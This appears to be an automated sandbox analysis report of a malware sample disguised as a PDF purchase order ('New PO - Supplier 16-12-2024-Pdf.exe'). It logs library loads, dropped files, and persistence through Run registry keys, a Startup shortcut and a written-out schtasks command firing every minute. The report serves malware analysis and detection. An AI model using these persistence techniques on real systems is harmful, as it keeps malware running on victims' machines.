                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: BBLXFG.lnk.2.drLNK file: ..\..\..\..\..\Windata\TXAASJ.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\iY4U6FM.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic file information: File size 2203648 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16f800
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EB20F6 LoadLibraryA,GetProcAddress,9_2_00EB20F6
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E77795 push ecx; ret 9_2_00E777A8

                              Persistence and Installation Behavior

                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\IPKGELNTQY\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeJump to dropped file
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\ProgramData\Synaptics\RCX6FCE.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeJump to dropped file

                              Boot Survival

                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnkJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BBLXFGJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E6F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_00E6F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EB7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_00EB7F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E71E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_00E71E5A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeWindow / User API: threadDelayed 4979Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeWindow / User API: foregroundWindowGot 1527Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_9-107906
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeAPI coverage: 3.8 %
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exe TID: 7032Thread sleep time: -49790s >= -30000sJump to behavior
